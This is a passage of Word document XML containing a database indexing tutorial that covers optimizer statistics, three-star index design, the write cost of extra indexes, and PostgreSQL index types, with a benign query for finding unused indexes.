    <w:p w14:paraId="68077D98" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="026A196C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Bitmap index scan (PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5DF89C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read index → collect ALL matching row pointers → sort by physical location → fetch in order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17513E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  I/O: index pages + sorted heap reads (reduces random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C947676" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Speed: Good for moderate selectivity (1–15% of table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46917CE3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 The Optimizer's Statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5670D925" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The optimizer relies on statistics to make good decisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424741A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AD6128" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL maintains (via ANALYZE / autovacuum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107500B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Row count per table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A852E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Distinct values per column (n_distinct)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B804DA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Most common values and their frequencies (MCV list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F6692" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Histogram of value distribution (for range estimation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EA849" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Correlation (physical order vs. logical order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0AC9AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Null fraction per column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E77419" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When statistics are stale, the optimizer makes bad decisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DA7CA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1467"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Thinks a table has 1000 rows when it has 10 million → chooses nested loop instead of hash join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FADFE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1467"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Thinks a column has uniform distribution when it's highly skewed → wrong selectivity estimate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B7901" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Regular ANALYZE (PostgreSQL) or UPDATE STATISTICS (SQL Server) or rely on auto-analyze.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610DF307" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="739A8BD0">
          <v:rect id="_x0000_i5326" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31414F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Index Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA377DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 The Three-Star Index System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A8FBC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A "three-star" index is the optimal index for a query (terminology from Relational Database Index Design):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA90473" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Star 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Index rows are in a sequence that satisfies the query's WHERE clause (no post-filtering). </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Star 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Index rows are in the order needed for ORDER BY (no sorting needed). </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Star 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Index contains all columns needed (covering — no heap fetch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C91DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601475D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT name, email FROM users WHERE status = 'active' ORDER BY created_at LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF9BFE8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0743D1FF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Three-star index: (status, created_at, name, email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBC547" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Star 1: status = 'active' → exact match on first column ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C23FD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Star 2: created_at → index is already sorted by created_at within status ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616D69AA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Star 3: name, email → included in index (covering) ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B86E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="46F35E8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Result: Index scan → return first 10 entries → done. No heap, no sort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017F3320" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Index Design Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8F552" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Identify critical queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (highest frequency, highest latency, or most important).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29480217" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: For each query, determine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A84ED48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688FB8D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- Which columns are in WHERE (equality and range)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB2CB72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- Which columns are in ORDER BY?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233CF39" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>- Which columns are in SELECT (for covering)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A18C75" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- What's the expected selectivity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28963AAC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Design the index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655ADFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40003353" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index columns = [equality WHERE columns] + [ORDER BY columns] + [range WHERE columns]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDD962" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>INCLUDE (non-key) = [SELECT columns not already in key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28496376" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Validate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22797E0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5D746" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- EXPLAIN ANALYZE the query with the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71805964" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- Verify index is used (not ignored by optimizer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F23DAC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- Measure actual improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F34E27F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>- Check write impact (inserts/updates slowed?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE21B60" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 How Many Indexes Is Too Many?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40E14F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The write penalty of each index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710465B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Every INSERT/UPDATE/DELETE must update EVERY index on the table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667BC71" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B51B69" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table with 0 indexes: INSERT = 1 heap write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E95540" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table with 1 index: INSERT = 1 heap write + 1 index write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C784460" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table with 5 indexes: INSERT = 1 heap write + 5 index writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE405B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table with 10 indexes: INSERT = 1 heap write + 10 index writes → 11x the write I/O!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BB4A04" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guidelines: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665"/>
        <w:gridCol w:w="4757"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="09DD54A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1358D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Workload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4309D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recommended Max Indexes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="0EA5480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043799" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Read-heavy OLTP (95% reads)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D5A846" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>5–10 indexes per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="154BE12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C993D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Write-heavy OLTP (50%+ writes)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3910F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>2–4 indexes per table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="6A66064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09EC84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:lastRenderedPageBreak/>
              <w:t>OLAP (analytics, batch)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C338C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>As many as needed (bulk load, then query)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="7D10F62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0CBA45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Mixed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52E465" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Balance based on critical queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EBFC23C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unused indexes are pure cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — they slow writes and consume storage/memory with zero read benefit. Regularly audit for unused indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8B34B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10721DCF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- PostgreSQL: find unused indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE5310" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT indexrelname, idx_scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F53D84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">FROM pg_stat_user_indexes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45CD56" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WHERE idx_scan = 0 AND indexrelname NOT LIKE '%pkey%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE35B05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="0AF29138">
          <v:rect id="_x0000_i5327" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4927B58B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Indexing in Specific Database Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C7076" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 PostgreSQL Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422325F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Available index types: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13"/>
        <w:gridCol w:w="3031"/>
        <w:gridCol w:w="1926"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="3AF41B5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74A9C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>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A14B52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case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D36C72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="22806B8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CAC9B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>B-Tree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A8CF17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>General purpose (default)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1D70E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>CREATE INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="41C3832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AA5404" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Hash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65F0DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
